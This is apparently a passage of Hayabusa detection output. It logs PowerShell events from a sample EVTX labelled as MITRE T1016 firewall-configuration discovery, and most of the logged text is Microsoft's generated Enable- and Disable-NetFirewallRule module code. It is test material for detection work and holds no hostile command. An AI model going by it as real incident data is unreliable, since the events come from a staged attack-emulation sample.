+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssocia",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
